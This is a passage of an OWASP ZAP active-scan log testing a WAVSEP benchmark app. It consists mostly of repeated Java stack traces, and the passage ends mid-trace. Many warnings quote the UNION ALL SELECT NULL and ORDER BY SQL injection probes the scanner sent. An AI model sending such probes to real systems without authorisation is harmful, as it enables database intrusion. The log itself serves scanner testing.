org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680435 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680437 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680438 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680439 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680441 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680442 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680443 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680443 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - Parameter 'target' is not injectable 9680444 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680445 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680446 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680447 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680448 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 4125#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') ORDER BY 4125# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680448 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 